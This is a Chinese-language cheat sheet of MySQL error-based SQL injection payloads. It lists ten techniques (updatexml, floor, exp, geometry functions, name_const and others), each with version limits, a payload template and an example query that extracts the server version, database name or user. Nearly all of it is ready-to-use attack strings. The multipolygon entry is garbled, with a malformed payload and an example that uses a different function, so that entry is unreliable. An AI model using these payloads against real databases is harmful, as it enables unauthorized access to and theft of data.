1. exp()報錯注入
   版本要求：5.5< mysql版本 <5.6
   payload

   and (exp(~(select * from (操作代碼) a)))
   

   列子：

   SELECT * FROM db WHERE db='test' and (exp(~(select * from (SELECT VERSION()) a)))
   

2. GeometryCollection()報錯注入
   版本要求：5.5< mysql版本 <5.6
   payload:

   and geometrycollection((select * from(select * from (操作代碼)a)b))
   

   例子：

   SELECT * FROM db WHERE db='test' and geometrycollection((select * from(select * from (SELECT VERSION())a)b))
   

3. UpdateXml()報錯注入
   版本要求：截至8.0.13可用
   payload：

   and updatexml(1,concat(0x7e,(操作代碼),0x7e),3)
   

   例子:

   SELECT * FROM db WHERE db='test' and updatexml(1,concat(0x7e,(SELECT DATABASE()),0x7e),3)
   

4. NAME_CONST()報錯注入
   版本要求：截至8.0.13可用
   payload:

   and exists(select * from (select * from(select name_const(操作代碼,0)) a join (select name_const(操作代碼,0)) b)c)
   

   例子：

   SELECT * FROM db WHERE db='test' and exists(select * from (select * from(select name_const(VERSION(),0)) a join (select name_const(VERSION(),0)) b)c)
   

5. join()報錯注入
   • 爆破列名
     版本要求：截至8.0.13可用
     payload:UNION SELECT * FROM (SELECT 1) a JOIN (SELECT 2) b
     例如:
     SELECT * FROM userid WHERE id = '1' UNION SELECT * FROM (SELECT 1) a JOIN (SELECT 2) b
6. linestring()報錯注入
   版本：5.5< mysql版本 <5.6

   and linestring((select * from(select * from(select user())a)b));
   

   例:

   SELECT * FROM db WHERE db='test' and linestring((select * from(select * from(select user())a)b));
   

7. multilinestring()報錯注入
   版本：5.5< mysql版本 <5.6

   and multilinestring((select * from(select * from(select VERSION())a)b));
   

   列：

   SELECT * FROM db WHERE db='test' and multilinestring((select * from(select * from(select VERSION())a)b));
   

8. multpolygon()報錯注入
   版本：5.5< mysql版本 <5.6

   payload:and multpolygon (()select * from(selectuser () )a)b );
   

   例：

   SELECT * FROM db WHERE db='test' and multipoint((select * from(select * from(select VERSION())a)b));
   

9. polygon ()報錯注入
   版本:5.5< mysql版本 <5.6

   and polygon((select * from(select * from(select VERSION())a)b));
   

   例:

   SELECT * FROM db WHERE db='test' and polygon((select * from(select * from(select VERSION())a)b));
   

10. floor()報錯注入
    • 第一種(常用)

      and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a);
      

      例：

      SELECT * FROM category WHERE cat_id = 1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
      

    • 第二種(薛定諤的貓版本，不常用)

      union select count(*), concat((payload), floor(rand()*2)) as a from information_schema.tables group by a;
      

      例：

      SELECT * FROM category WHERE cat_id = 1 union select count(*), concat((SELECT VERSION()), floor(rand()*2)) as a from information_schema.tables group by a;
      

參考文章
http://www.rzrgm.cn/wocalieshenmegui/p/5917967.html